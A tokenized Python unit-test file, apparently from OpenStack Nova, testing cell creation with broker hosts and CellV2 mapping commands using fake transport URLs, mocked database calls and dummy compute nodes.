op|'='
string|"'127.0.0.1:'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_wrong_port_arg
dedent|''
name|'def'
name|'test_create_transport_hosts_wrong_port_arg'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method when port\n argument is wrongly sepcified\n """'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'ValueError'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|','
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'hostname'
op|'='
string|"'127.0.0.1'"
op|','
name|'port'
op|'='
string|"'ab'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'context'
op|','
string|"'get_admin_context'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'db'
op|','
string|"'cell_create'"
op|')'
newline|'\n'
DECL|member|test_create_broker_hosts
name|'def'
name|'test_create_broker_hosts'
op|'('
name|'self'
op|','
name|'mock_db_cell_create'
op|','
name|'mock_ctxt'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the create function when broker_hosts is\n passed\n """'
newline|'\n'
name|'cell_tp_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:5432"'
newline|'\n'
name|'cell_tp_url'
op|'+='
string|'",guest:devstack@127.0.0.2:9999/"'
newline|'\n'
name|'ctxt'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'mock_ctxt'
op|'.'
name|'return_value'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'create'
op|'('
string|'"test"'
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:5432,127.0.0.2:9999'"
op|','
nl|'\n'
name|'woffset'
op|'='
number|'0'
op|','
name|'wscale'
op|'='
number|'0'
op|','
nl|'\n'
name|'username'
op|'='
string|'"guest"'
op|','
name|'password'
op|'='
string|'"devstack"'
op|')'
newline|'\n'
name|'exp_values'
op|'='
op|'{'
string|"'name'"
op|':'
string|'"test"'
op|','
nl|'\n'
string|"'is_parent'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'transport_url'"
op|':'
name|'cell_tp_url'
op|','
nl|'\n'
string|"'weight_offset'"
op|':'
number|'0.0'
op|','
nl|'\n'
string|"'weight_scale'"
op|':'
number|'0.0'
op|'}'
newline|'\n'
name|'mock_db_cell_create'
op|'.'
name|'assert_called_once_with'
op|'('
name|'ctxt'
op|','
name|'exp_values'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'context'
op|','
string|"'get_admin_context'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'db'
op|','
string|"'cell_create'"
op|')'
newline|'\n'
DECL|member|test_create_broker_hosts_with_url_decoding_fix
name|'def'
name|'test_create_broker_hosts_with_url_decoding_fix'
op|'('
name|'self'
op|','
nl|'\n'
name|'mock_db_cell_create'
op|','
nl|'\n'
name|'mock_ctxt'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the create function when broker_hosts is\n passed\n """'
newline|'\n'
name|'cell_tp_url'
op|'='
string|'"fake://the=user:the=password@127.0.0.1:5432/"'
newline|'\n'
name|'ctxt'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'mock_ctxt'
op|'.'
name|'return_value'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'create'
op|'('
string|'"test"'
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:5432'"
op|','
nl|'\n'
name|'woffset'
op|'='
number|'0'
op|','
name|'wscale'
op|'='
number|'0'
op|','
nl|'\n'
name|'username'
op|'='
string|'"the=user"'
op|','
nl|'\n'
name|'password'
op|'='
string|'"the=password"'
op|')'
newline|'\n'
name|'exp_values'
op|'='
op|'{'
string|"'name'"
op|':'
string|'"test"'
op|','
nl|'\n'
string|"'is_parent'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'transport_url'"
op|':'
name|'cell_tp_url'
op|','
nl|'\n'
string|"'weight_offset'"
op|':'
number|'0.0'
op|','
nl|'\n'
string|"'weight_scale'"
op|':'
number|'0.0'
op|'}'
newline|'\n'
name|'mock_db_cell_create'
op|'.'
name|'assert_called_once_with'
op|'('
name|'ctxt'
op|','
name|'exp_values'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'context'
op|','
string|"'get_admin_context'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'db'
op|','
string|"'cell_create'"
op|')'
newline|'\n'
DECL|member|test_create_hostname
name|'def'
name|'test_create_hostname'
op|'('
name|'self'
op|','
name|'mock_db_cell_create'
op|','
name|'mock_ctxt'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the create function when hostname and port is\n passed\n """'
newline|'\n'
name|'cell_tp_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:9999/"'
newline|'\n'
name|'ctxt'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'mock_ctxt'
op|'.'
name|'return_value'
op|'='
name|'mock'
op|'.'
name|'sentinel'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'create'
op|'('
string|'"test"'
op|','
nl|'\n'
name|'hostname'
op|'='
string|"'127.0.0.1'"
op|','
name|'port'
op|'='
string|'"9999"'
op|','
nl|'\n'
name|'woffset'
op|'='
number|'0'
op|','
name|'wscale'
op|'='
number|'0'
op|','
nl|'\n'
name|'username'
op|'='
string|'"guest"'
op|','
name|'password'
op|'='
string|'"devstack"'
op|')'
newline|'\n'
name|'exp_values'
op|'='
op|'{'
string|"'name'"
op|':'
string|'"test"'
op|','
nl|'\n'
string|"'is_parent'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'transport_url'"
op|':'
name|'cell_tp_url'
op|','
nl|'\n'
string|"'weight_offset'"
op|':'
number|'0.0'
op|','
nl|'\n'
string|"'weight_scale'"
op|':'
number|'0.0'
op|'}'
newline|'\n'
name|'mock_db_cell_create'
op|'.'
name|'assert_called_once_with'
op|'('
name|'ctxt'
op|','
name|'exp_values'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|CellV2CommandsTestCase
dedent|''
dedent|''
name|'class'
name|'CellV2CommandsTestCase'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'CellV2CommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'CellV2Commands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell_and_hosts
dedent|''
name|'def'
name|'test_map_cell_and_hosts'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Create some fake compute nodes and check if they get host mappings'
nl|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
op|')'
newline|'\n'
name|'values'
op|'='
op|'{'
nl|'\n'
string|"'vcpus'"
op|':'
number|'4'
op|','
nl|'\n'
string|"'memory_mb'"
op|':'
number|'4096'
op|','
nl|'\n'
string|"'local_gb'"
op|':'
number|'1024'
op|','
nl|'\n'
string|"'vcpus_used'"
op|':'
number|'2'
op|','
nl|'\n'
string|"'memory_mb_used'"
op|':'
number|'2048'
op|','
nl|'\n'
string|"'local_gb_used'"
op|':'
number|'512'
op|','
nl|'\n'
string|"'hypervisor_type'"
op|':'
string|"'Hyper-Dan-VM-ware'"
op|','
nl|'\n'
string|"'hypervisor_version'"
op|':'
number|'1001'
op|','
nl|'\n'
string|"'cpu_info'"
op|':'
string|"'Schmintel i786'"
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host%s'"
op|'%'
name|'i'
newline|'\n'
name|'compute_node'
op|'='
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
name|'ctxt'
op|','
name|'host'
op|'='
name|'host'
op|','
op|'**'
name|'values'
op|')'
newline|'\n'
name|'compute_node'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
dedent|''
name|'cell_transport_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:9999/"'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell_and_hosts'
op|'('
name|'cell_transport_url'
op|','
name|'name'
op|'='
string|"'ssd'"
op|','
nl|'\n'
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
name|'cell_mapping_uuid'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'strip'
op|'('
op|')'
newline|'\n'
comment|'# Verify the cell mapping'
nl|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'.'
name|'get_by_uuid'
op|'('
name|'ctxt'
op|','
name|'cell_mapping_uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'ssd'"
op|','
name|'cell_mapping'
op|'.'
name|'name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'cell_transport_url'
op|','
name|'cell_mapping'
op|'.'
name|'transport_url'
op|')'
newline|'\n'
comment|'# Verify the host mappings'
nl|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host%s'"
op|'%'
name|'i'
newline|'\n'
name|'host_mapping'
op|'='
name|'objects'
op|'.'
name|'HostMapping'
op|'.'
name|'get_by_host'
op|'('
name|'ctxt'
op|','
name|'host'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'cell_mapping'
op|'.'
name|'uuid'
op|','
name|'host_mapping'
op|'.'
name|'cell_mapping'
op|'.'
name|'uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell_and_hosts_duplicate
dedent|''
dedent|''
name|'def'
name|'test_map_cell_and_hosts_duplicate'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Create a cell mapping and hosts and check that nothing new is created'
nl|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
op|')'
newline|'\n'
name|'cell_mapping_uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'uuid'
op|'='
name|'cell_mapping_uuid'
op|','
name|'name'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'transport_url'
op|'='
string|"'fake://'"
op|','
name|'database_connection'
op|'='
string|"'fake://'"
op|')'
newline|'\n'
name|'cell_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
comment|'# Create compute nodes that will map to the cell'
nl|'\n'
name|'values'
op|'='
op|'{'
nl|'\n'
string|"'vcpus'"
op|':'
number|'4'
op|','
nl|'\n'
string|"'memory_mb'"
op|':'
number|'4096'
op|','
nl|'\n'
string|"'local_gb'"
op|':'
number|'1024'
op|','
nl|'\n'
string|"'vcpus_used'"
op|':'
number|'2'
op|','
nl|'\n'
string|"'memory_mb_used'"
op|':'
number|'2048'
op|','
nl|'\n'
string|"'local_gb_used'"
op|':'
number|'512'
op|','
nl|'\n'
string|"'hypervisor_type'"
op|':'
string|"'Hyper-Dan-VM-ware'"
op|','
nl|'\n'
string|"'hypervisor_version'"
op|':'
number|'1001'
op|','
nl|'\n'
string|"'cpu_info'"
op|':'
string|"'Schmintel i786'"
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host%s'"
op|'%'
name|'i'
newline|'\n'
name|'compute_node'
op|'='
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
name|'ctxt'
op|','
name|'host'
op|'='
name|'host'
op|','
op|'**'
name|'values'
op|')'
newline|'\n'
name|'compute_node'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
name|'host_mapping'
op|'='
name|'objects'
op|'.'
name|'HostMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'host'
op|'='
name|'host'
op|','
name|'cell_mapping'
op|'='
name|'cell_mapping'
op|')'
newline|'\n'
name|'host_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
dedent|''
name|'cell_transport_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:9999/"'
newline|'\n'
name|'retval'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell_and_hosts'
op|'('
name|'cell_transport_url'
op|','
nl|'\n'
name|'name'
op|'='
string|"'ssd'"
op|','
nl|'\n'
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'retval'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'strip'
op|'('
op|')'
newline|'\n'
name|'expected'
op|'='
string|"''"
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'expected'
op|'+='
op|'('
string|"'Host host%s is already mapped to cell %s\\n'"
op|'%'
nl|'\n'
op|'('
name|'i'
op|','
name|'cell_mapping_uuid'
op|')'
op|')'
newline|'\n'
dedent|''
name|'expected'
op|'+='
string|"'All hosts are already mapped to cell(s), exiting.'"
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell_and_hosts_partial_update
dedent|''
name|'def'
name|'test_map_cell_and_hosts_partial_update'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Create a cell mapping and partial hosts and check that'
nl|'\n'
comment|'# missing HostMappings are created'
nl|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
op|')'
newline|'\n'
name|'cell_mapping_uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'uuid'
op|'='
name|'cell_mapping_uuid'
op|','
name|'name'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'transport_url'
op|'='
string|"'fake://'"
op|','
name|'database_connection'
op|'='
string|"'fake://'"
op|')'
newline|'\n'
name|'cell_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
comment|'# Create compute nodes that will map to the cell'
nl|'\n'
name|'values'
op|'='
op|'{'
nl|'\n'
string|"'vcpus'"
op|':'
number|'4'
op|','
nl|'\n'
string|"'memory_mb'"
op|':'
number|'4096'
op|','
nl|'\n'
string|"'local_gb'"
op|':'
number|'1024'
op|','
nl|'\n'
string|"'vcpus_used'"
op|':'
number|'2'
op|','
nl|'\n'
string|"'memory_mb_used'"
op|':'
number|'2048'
op|','
nl|'\n'
string|"'local_gb_used'"
op|':'
number|'512'
op|','
nl|'\n'
string|"'hypervisor_type'"
op|':'
string|"'Hyper-Dan-VM-ware'"
op|','
nl|'\n'
string|"'hypervisor_version'"
op|':'
number|'1001'
op|','
nl|'\n'
string|"'cpu_info'"
op|':'
string|"'Schmintel i786'"
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host%s'"
op|'%'
name|'i'
newline|'\n'
name|'compute_node'
op|'='
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
name|'ctxt'
op|','
name|'host'
op|'='
name|'host'
op|','
op|'**'
name|'values'
op|')'
newline|'\n'
name|'compute_node'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
comment|'# Only create 2 existing HostMappings out of 3'
nl|'\n'
dedent|''
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'2'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host%s'"
op|'%'
name|'i'
newline|'\n'
name|'host_mapping'
op|'='
name|'objects'
op|'.'
name|'HostMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'host'
op|'='
name|'host'
op|','
name|'cell_mapping'
op|'='
name|'cell_mapping'
op|')'
newline|'\n'
name|'host_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
dedent|''
name|'cell_transport_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:9999/"'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell_and_hosts'
op|'('
name|'cell_transport_url'
op|','
nl|'\n'
name|'name'
op|'='
string|"'ssd'"
op|','
nl|'\n'
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
comment|'# Verify the HostMapping for the last host was created'
nl|'\n'
name|'host_mapping'
op|'='
name|'objects'
op|'.'
name|'HostMapping'
op|'.'
name|'get_by_host'
op|'('
name|'ctxt'
op|','
string|"'host2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'cell_mapping'
op|'.'
name|'uuid'
op|','
name|'host_mapping'
op|'.'
name|'cell_mapping'
op|'.'
name|'uuid'
op|')'
newline|'\n'
comment|'# Verify the output'
nl|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'strip'
op|'('
op|')'
newline|'\n'
name|'expected'
op|'='
string|"''"
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'2'
op|')'
op|':'
newline|'\n'
indent|' '
name|'expected'
op|'+='
op|'('
string|"'Host host%s is already mapped to cell %s\\n'"
op|'%'
nl|'\n'
op|'('
name|'i'
op|','
name|'cell_mapping_uuid'
op|')'
op|')'
newline|'\n'
comment|'# The expected CellMapping UUID for the last host should be the same'
nl|'\n'
dedent|''
name|'expected'
op|'+='
name|'cell_mapping'
op|'.'
name|'uuid'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell_and_hosts_no_hosts_found
dedent|''
name|'def'
name|'test_map_cell_and_hosts_no_hosts_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'cell_transport_url'
op|'='
string|'"fake://guest:devstack@127.0.0.1:9999/"'
newline|'\n'
name|'retval'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell_and_hosts'
op|'('
name|'cell_transport_url'
op|','
nl|'\n'
name|'name'
op|'='
string|"'ssd'"
op|','
nl|'\n'
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'retval'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'strip'
op|'('
op|')'
newline|'\n'
name|'expected'
op|'='
string|"'No hosts found to map to cell, exiting.'"
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_instances
dedent|''
name|'def'
name|'test_map_instances'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
string|"'fake-user'"
op|','
string|"'fake_project'"
op|')'
newline|'\n'
name|'cell_uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'uuid'
op|'='
name|'cell_uuid'
op|','
name|'name'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'transport_url'
op|'='
string|"'fake://'"
op|','
name|'database_connection'
op|'='
string|"'fake://'"
op|')'
newline|'\n'
name|'cell_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
name|'instance_uuids'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'instance_uuids'
op|'.'
name|'append'
op|'('
name|'uuid'
op|')'
newline|'\n'
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'ctxt'
op|','
name|'project_id'
op|'='
name|'ctxt'
op|'.'
name|'project_id'
op|','
nl|'\n'
name|'uuid'
op|'='
name|'uuid'
op|')'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_instances'
op|'('
name|'cell_uuid'
op|')'
newline|'\n'
nl|'\n'
name|'for'
name|'uuid'
name|'in'
name|'instance_uuids'
op|':'
newline|'\n'
indent|' '
name|'inst_mapping'
op|'='
name|'objects'
op|'.'
name|'InstanceMapping'
op|'.'
name|'get_by_instance_uuid'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'ctxt'
op|'.'
name|'project_id'
op|','
name|'inst_mapping'
op|'.'
name|'project_id'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'cell_mapping'
op|'.'
name|'uuid'
op|','
name|'inst_mapping'
op|'.'
name|'cell_mapping'
op|'.'
name|'uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_instances_duplicates
dedent|''
dedent|''
name|'def'
name|'test_map_instances_duplicates'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
string|"'fake-user'"
op|','
string|"'fake_project'"
op|')'
newline|'\n'
name|'cell_uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'uuid'
op|'='
name|'cell_uuid'
op|','
name|'name'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'transport_url'
op|'='
string|"'fake://'"
op|','
name|'database_connection'
op|'='
string|"'fake://'"
op|')'
newline|'\n'
name|'cell_mapping'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
name|'instance_uuids'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'3'
op|')'
op|':'
newline|'\n'
indent|' '
name|'uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'instance_uuids'
op|'.'
name|'append'
op|'('
name|'uuid'
op|')'
newline|'\n'
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'ctxt'
op|','
name|'project_id'
op|'='
name|'ctxt'
op|'.'
name|'project_id'
op|','
nl|'\n'
name|'uuid'
op|'='
name|'uuid'
op|')'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'objects'
op|'.'
name|'InstanceMapping'
op|'('
name|'ctxt'
op|','
name|'project_id'
op|'='
name|'ctxt'
op|'.'
name|'project_id'
op|','
nl|'\n'
name|'instance_uuid'
op|'='
name|'instance_uuids'
op|'['
number|'0'
op|']'
op|','
nl|'\n'
name|'cell_mapping'
op|'='
name|'cell_mapping'
op|')'
op|'.'
name|'create'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_instances'
op|'('
name|'cell_uuid'
op|','
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'strip'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'%s already mapped to cell'"
op|'%'
name|'instance_uuids'
op|'['
number|'0'
op|']'
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
name|'for'
name|'uuid'
name|'in'
name|'instance_uuids'
op|':'
newline|'\n'
indent|' '
name|'inst_mapping'
op|'='
name|'objects'
op|'.'
name|'InstanceMapping'
op|'.'
name|'get_by_instance_uuid'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'ctxt'
op|'.'
name|'project_id'
op|','
name|'inst_mapping'
op|'.'
name|'project_id'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell0
dedent|''
dedent|''
name|'def'
name|'test_map_cell0'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
op|')'
newline|'\n'
name|'database_connection'
op|'='
string|"'fake:/foobar//'"
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell0'
op|'('
name|'database_connection'
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'.'
name|'get_by_uuid'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'CellMapping'
op|'.'
name|'CELL0_UUID'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'cell0'"
op|','
name|'cell_mapping'
op|'.'
name|'name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'none:///'"
op|','
name|'cell_mapping'
op|'.'
name|'transport_url'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'database_connection'
op|','
name|'cell_mapping'
op|'.'
name|'database_connection'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_map_cell0_default_database
dedent|''
name|'def'
name|'test_map_cell0_default_database'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'CONF'
op|'.'
name|'set_default'
op|'('
string|"'connection'"
op|','
nl|'\n'
string|"'fake://netloc/nova_api'"
op|','
nl|'\n'
name|'group'
op|'='
string|"'api_database'"
op|')'
newline|'\n'
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'RequestContext'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'map_cell0'
op|'('
op|')'
newline|'\n'
name|'cell_mapping'
op|'='
name|'objects'
op|'.'
name|'CellMapping'
op|'.'
name|'get_by_uuid'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'CellMapping'
op|'.'
name|'CELL0_UUID'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'cell0'"
op|','
name|'cell_mapping'
op|'.'
name|'name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'none:///'"
op|','
name|'cell_mapping'
op|'.'
name|'transport_url'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake://netloc/nova_api_cell0'"
op|','
nl|'\n'
name|'cell_mapping'
op|'.'
name|'database_connection'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 12.453739 | 265 | 0.597873 | 12,540 | 84,262 | 3.913078 | 0.039394 | 0.158345 | 0.091094 | 0.075036 | 0.905747 | 0.868616 | 0.837151 | 0.806929 | 0.770817 | 0.732892 | 0 | 0.012838 | 0.099618 | 84,262 | 6,765 | 266 | 12.45558 | 0.633943 | 0 | 0 | 0.952846 | 0 | 0.000591 | 0.362631 | 0.049204 | 0 | 0 | 0 | 0 | 0.018773 | 0 | null | null | 0.001478 | 0.002809 | null | null | 0.000296 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
